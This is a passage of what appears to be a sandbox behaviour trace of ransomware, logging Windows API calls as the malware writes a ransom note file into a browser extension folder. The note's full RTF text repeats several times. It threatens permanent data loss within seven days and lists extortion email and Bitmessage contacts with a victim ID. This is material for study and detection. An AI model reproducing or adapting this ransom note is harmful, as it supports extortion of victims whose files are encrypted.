thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÀv¤Aô\x81éwª1\x9c`\x8fºÊ\x11òÜ\"\x8dP-?Ó\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.293] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.296] CloseHandle (hObject=0x294) returned 1 [0285.296] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\#readme_eman#.rtf")) returned 0xffffffff [0285.296] GetLastError () returned 0x2 [0285.296] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ja\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.297] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 